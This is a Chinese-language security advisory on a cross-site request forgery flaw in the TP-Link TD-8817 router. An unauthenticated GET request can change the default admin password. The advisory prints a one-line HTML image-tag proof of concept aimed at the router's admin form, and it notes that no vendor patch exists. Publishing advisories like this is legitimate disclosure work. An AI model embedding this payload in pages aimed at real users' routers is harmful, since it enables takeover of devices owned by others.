受影响系统:
TP-LINK TD-8817 6.0.1 Build 111128 Rel.26763
描述:
BUGTRAQ ID: 58921
TP-Link TD-8817是ADSL2+以太网/USB解调器路由器。
TP-Link TD-8817的默认用户(admin)密码可以在tcp/ip端口80上通过默认路由器页面更改。$_GET即可以更改密码,而无需$_POST请求方法。攻击者可利用此漏洞执行某些管理员操作并非法访问受影响设备。
<*来源:Un0wn_X 链接:http://packetstormsecurity.com/files/121127/tplinktd8817-xsrf.txt *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<html>
<!– TP-Link TD-8817 CSRF Explpoit –>
<body>
<img src="http://192.168.1.1/Forms/tools_admin_1"/>
</body>
</html>
建议:
厂商补丁:
TP-LINK
——-
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.tp-link.com/lk/products/details/?model=TD-8817
评论关闭。